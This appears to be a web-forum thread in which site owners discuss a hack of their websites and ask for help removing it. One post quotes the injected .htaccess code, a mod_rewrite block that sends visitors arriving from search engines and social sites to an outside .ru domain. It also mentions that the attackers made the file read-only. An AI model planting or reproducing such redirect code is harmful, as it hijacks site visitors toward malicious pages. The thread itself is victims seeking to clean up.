Hydromantic

Could you tell me more about the images names placed by the hack you found?

Yep. They add this code to the htacces file :

<IfModule mod_rewrite.c>																														

																														RewriteEngine On																														

																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)																														

																														RewriteRule ^(.*)$ https://bannortimqimulta.ru/industry/index.php [R=301,L]																														

																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														

																														RewriteRule ^(.*)$ https://bannortimqimulta.ru/industry/index.php [R=301,L]																														

																														</IfModule>

And they change the htaccess permissions to 444 instead of 604. What can we do?

Same here! It seems that they have access to the FTP and it’s hard to prevent these htaccess files!! Any help welcome, my provider doesn’t help neither!!

Hi! Same problem here, I post here to get follow up posts in my emails ??

Any news about this hacking attack?

Unfortunately I found nothing in the htaccess file, do you mean the one in the root of the domain?

I didn’t find any corrupted subdirectory neither…

It seems that the problem comes from the index page but I don’t find much more…

I tried the fresh install but it changed nothing unfortunately…

Hi everyone!

Exactly the same problem here unfortunately… I tried various things but nothing works. Did you find which files was hacked? I don’t find them…

Many thanks!!